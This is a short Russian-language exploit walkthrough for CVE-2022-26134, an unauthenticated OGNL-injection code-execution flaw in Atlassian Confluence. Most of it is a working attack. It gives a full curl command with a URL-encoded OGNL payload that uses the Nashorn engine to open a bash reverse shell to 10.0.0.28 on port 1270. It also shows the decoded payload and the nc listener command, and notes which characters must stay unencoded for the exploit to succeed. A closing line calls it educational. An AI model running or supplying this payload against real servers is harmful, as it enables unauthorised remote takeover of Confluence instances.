
Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26134
CVE-2022-26134 — это критическая уязвимость удаленного выполнения кода (RCE), затрагивающая Atlassian Confluence. Эта уязвимость позволяет неаутентифицированным злоумышленникам выполнять произвольный код путем внедрения OGNL-выражений в уязвимые конечные точки.
Следующая команда CURL демонстрирует активную эксплуатацию этой уязвимости, используя движок Nashorn Java для выполнения реверс-шелла:
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
Внося эти изменения, мы также должны учитывать URL-кодирование. Строка полезной нагрузки в доказательстве концепции не полностью закодирована в URL. Некоторые символы (а именно ".", "-" и "/") не кодируются. Хотя это не всегда так, для данного эксплойта это оказывается важным для функционирования полезной нагрузки. Если любой из этих символов закодирован, сервер будет интерпретировать URL иначе, и полезная нагрузка может не выполниться. Это означает, что мы не можем применить URL-кодирование ко всей полезной нагрузке после ее изменения.
${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
nc -lvnp 1270
Эта документация предназначена только для образовательных целей. Несанкционированная эксплуатация систем незаконна и может привести к серьезным последствиям. Всегда получайте надлежащее разрешение перед проведением оценки безопасности.